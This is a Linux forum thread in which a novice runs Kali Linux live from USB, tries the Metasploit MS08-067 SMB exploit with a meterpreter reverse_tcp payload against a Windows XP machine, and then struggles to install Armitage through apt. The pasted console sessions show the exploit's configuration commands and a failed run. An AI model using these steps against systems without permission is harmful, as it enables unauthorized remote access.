Tried kali to find XP system connected via Ethernet to the network
Linux - NewbieThis Linux forum is for members that are new to Linux.
Just starting out and have a question?
If it is not in the man pages or the how-to's this is the place!
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
[-] Unknown command: exploit/windows/smb/ms08_067_netapi
This is a module we can load. Do you want to use exploit/windows/smb/ms08_067_netapi? [y/N] y[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >
I tried the above?
Last edited by anon286; 07-02-2023 at 12:45 PM.
Reason: Tried ms08 search
Selected Target: Windows XP SP0/SP1 Universal
[-] Target IP - Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)[*] Exploit completed, but no session was created.
I got this error above after trying the commands below.
msf6 > use windows/smb/ms08_067_netapi[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > RHOST IP
[-] Unknown command: RHOST
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOST IP
RHOST => IP
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set LPORT 80
LPORT => 80
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST IP
LHOST => IP
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
┌──(kali㉿kali)-[~]
└─$ ~# armitage
~#: command not found
┌──(kali㉿kali)-[~]
└─$ # Start Armitage
armitage
Command 'armitage' not found, but can be installed with:
sudo apt install armitage
Do you want to install it? (N/y)y
sudo apt install armitage
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package armitage
┌──(kali㉿kali)-[~]
└─$ systemctl start postgresql
┌──(kali㉿kali)-[~]
└─$ msfdb init
[-] Error: /usr/bin/msfdb must be run as root
┌──(kali㉿kali)-[~]
└─$ # Start Armitage
armitage
Command 'armitage' not found, but can be installed with:
sudo apt install armitage
Do you want to install it? (N/y)y
sudo apt install armitage
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package armitage
All i did was, install the kali on a USB I have, run it on a system, disable drives, and the USB is the only storage loaded.
That is all I have done, and what I know. I then run the live option, so no installation of the kali system. Logged into the wifi network, and I have accessed to the connection and I can then find the system I have and you know as I posted above, got the bare bones info, which is was a step in the correct direction.
Am I suppose to have kali installed as a primary system on a storage disk or drive? E must be the USB. Not sure what E would mean other than the USB.
Let us assume that we want to install the very popular port scanning tool nmap on a Debian machine, using apt, which yields the following:
$ sudo apt install nmap
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package nmap
So apt couldn’t find the nmap package from its archives. We know that apt uses the source lists under /etc/apt/sources.list to locate packages. So open the same with your favorite text editor and with superuser privileges. Here we should find something like this :
# deb http://deb.debian.org/debian bullseye main
# deb-src http://deb.debian.org/debian bullseye main
Ensure you have all the official source repositories of your particular distribution and version. You can get a list of the official mirror’s on the Distro’s site.
2. Explaining Source Lists
Let’s analyze the first line to understand what each component signifies :
According to a youtube video, the file requires an edit so that armitage can be downloaded or installed.
Since I'm using the live version only, that is why there is no tool like armitage.
What would installing do the USB, would it not allocate some space for the kali system, and keep any files I have there. Or everything is likely to be over written.
┌──(kali㉿kali)-[~]
└─$ sudo apt upgrade
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
┌──(kali㉿kali)-[~]
└─$ apt install armitage
E: Could not open lock file /var/lib/dpkg/lock-frontend - open (13: Permission denied)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), are you root?
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.